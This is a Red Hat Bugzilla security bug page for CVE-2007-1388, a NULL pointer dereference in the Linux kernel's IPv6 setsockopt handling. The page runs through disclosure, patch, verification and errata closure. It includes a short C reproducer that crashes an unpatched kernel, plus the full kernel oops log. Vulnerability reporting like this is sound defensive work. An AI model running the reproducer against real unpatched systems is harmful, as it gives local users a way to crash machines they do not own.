Note: This bug is displayed in read-only format because the product is no longer active in Red Hat Bugzilla.
For bugs related to Red Hat Enterprise Linux 5 product line. The current stable release is 5.10. For Red Hat Enterprise Linux 6 and above, please visit Red Hat JIRA https://issues.redhat.com/secure/CreateIssue!default.jspa?pid=12332745 to report new issues.

Bug 232255

Summary: CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Product: Red Hat Enterprise Linux 5 Reporter: Marcel Holtmann <holtmann>
Component: kernelAssignee: Don Howard <dhoward>
Status: CLOSED ERRATA QA Contact: Martin Jenner <mjenner>
Severity: high Docs Contact:
Priority: medium    
Version: 5.0CC: security-response-team
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard: impact=important,source=vendorsec,reported=20070309,public=20070308 Line 417, opt can be NULL and dereferenced : opt = ipv6_renew_options(sk, np->opt, optname, // opt = NULL (struct ipv6_opt_hdr __user *)optval, optlen); if (IS_ERR(opt)) { retv = PTR_ERR(opt); break; } /* routing header option needs extra check */ if (optname == IPV6_RTHDR && opt->srcrt) { // Oops Those few lines reproduce the bug : #include <netinet/in.h> int main(int argc, char **argv) { int s, optval; s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0); return 0; } Kernel Oops here : Mar 8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000010 Mar 8 23:57:17 localhost kernel: printing eip: Mar 8 23:57:17 localhost kernel: f8ebb270 Mar 8 23:57:17 localhost kernel: *pde = 00000000 Mar 8 23:57:17 localhost kernel: Oops: 0000 [#1] Mar 8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core 8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211 ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor Mar 8 23:57:17 localhost kernel: CPU: 0 Mar 8 23:57:17 localhost kernel: EIP: 0060:[<f8ebb270>] Tainted: P VLI Mar 8 23:57:17 localhost kernel: EFLAGS: 00010246 (2.6.17-11-386 #2) Mar 8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6] Mar 8 23:57:17 localhost kernel: eax: 00000000 ebx: f0cfca40 ecx: 00000039 edx: 00000000 Mar 8 23:57:17 localhost kernel: esi: 00000000 edi: 00000000 ebp: 00000039 esp: f25a9da8 Mar 8 23:57:17 localhost kernel: ds: 007b es: 007b ss: 0068 Mar 8 23:57:17 localhost kernel: Process null_deref (pid: 5076, threadinfo=f25a8000 task=f24a7580) Mar 8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff 00000001 00000000 f0cfce58 ee42e9c0 Mar 8 23:57:17 localhost kernel: c18e1e7c c0179c74 3b9aca00 c199ce00 c18e1de0 ee42e9c0 c18e1e7c 00000000 Mar 8 23:57:17 localhost kernel: c199ce00 00000000 ee42e9c0 c18e1e7c 00000000 c013c78b 00001000 c0359330 Mar 8 23:57:17 localhost kernel: Call Trace: Mar 8 23:57:17 localhost kernel: <c0179c74> __mark_inode_dirty+0x34/0x170 <c013c78b> do_generic_mapping_read+0x42b/0x540 Mar 8 23:57:17 localhost kernel: <c0154f74> cache_alloc_refill+0x314/0x4d0 <c01cc98c> vsnprintf+0x55c/0x640 Mar 8 23:57:17 localhost kernel: <c016f0b7> d_alloc+0x27/0x190 <c016f059> d_instantiate+0x49/0x80 Mar 8 23:57:17 localhost kernel: <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] <c0289966> tcp_setsockopt+0x36/0x370 Mar 8 23:57:17 localhost kernel: <c0259e83> sock_common_setsockopt+0x23/0x30 <c02587d5> sys_setsockopt+0x75/0xd0 Mar 8 23:57:17 localhost kernel: <c0259a19> sys_socketcall+0x209/0x280 <c02c7a00> do_page_fault+0x0/0x6e0 Mar 8 23:57:17 localhost kernel: <c0102dbb> sysenter_past_esp+0x54/0x79 Mar 8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83 3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6 ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 Mar 8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40 impact=important,source=vendorsec,reported=20070309,public=20070308
Fixed In Version: RHSA-2007-0169 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2007-04-30 16:37:48 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Marcel Holtmann 2007-03-14 16:00:56 UTC 
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417, opt can be NULL and dereferenced :
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


Those few lines reproduce the bug :

#include <netinet/in.h>

int main(int argc, char **argv) {
  int s, optval;

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

  return 0;
}


Kernel Oops here :

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp
l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats
freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video
tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery
container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp
parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core
8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss
snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211
ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp
agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd
uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal
processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2) 
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039
  edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039
  esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076,
threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff
00000001 00000000 f0cfce58 ee42e9c0 
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00
c18e1de0 ee42e9c0 c18e1e7c 00000000 
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c
00000000 c013c78b 00001000 c0359330 
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170 
<c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0 
<c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059>
d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] 
<c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30 
<c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280 
<c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79 
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83
3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6
ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40
[ipv6] SS:ESP 0068:f25a9da8
Comment 3 Don Howard 2007-03-29 21:41:56 UTC 
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.
Comment 5 Mike Gahagan 2007-04-26 22:13:28 UTC 
verified on x86_64 system.
Comment 7 Red Hat Bugzilla 2007-04-30 16:37:48 UTC 
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html